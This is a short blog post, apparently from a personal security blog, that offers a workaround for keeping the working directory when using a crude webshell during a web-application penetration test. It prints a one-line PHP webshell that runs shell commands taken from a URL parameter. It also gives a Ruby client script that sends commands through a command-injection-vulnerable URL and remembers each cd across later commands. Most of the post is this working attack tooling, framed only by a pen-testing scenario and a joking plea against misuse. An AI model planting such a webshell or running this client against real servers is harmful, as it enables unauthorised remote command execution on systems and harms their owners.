Directory persistence hack for webshells

The scenario: you’re busy pen testing a webapp and you get code execution somehow. Probably with a dinky little webshell like <?php echo shell_exec($_GET['e']); ?>. For whatever reason, you can’t get or don’t feel like getting something more sophisticated. But the one thing that really irritates you is having to cd through to the directory you want with every new command.

Well, here’s a little Ruby script that will do that for you, literally by remembering every single one of your cds and prepending them, in order, to all future commands. Happy hacking.

# Simple directory-aware webshell hack
# Todo: get open-uri to co-operate with shell args for URLs
# For now, put the whole command-injection-vulnerable URL in the place indicated
# pls don't use for evil

require 'open-uri'

prefix = ""
command = "whoami"
while true
  print "> "
  command = gets.chomp
  exit if command == "exit"

  result = ""
  open("#{URLGOESHERE}"+URI::encode(prefix+command)) do |http|
    result = http.read
  end
  puts prefix+command

  #keep directory
  prefix += command+";" if command.include? "cd"

  puts "\n#{result}"
end

Game: I Hunger
Archive of posts
Text editors I: Vim
similar posts
Select only nth row in T-SQL (pre-2012)
Automated file upload in Ruby with Net::HTTP and MultipartBody
Nested global substitution in Ruby
Postmortem: Trollcave
webmentions(?)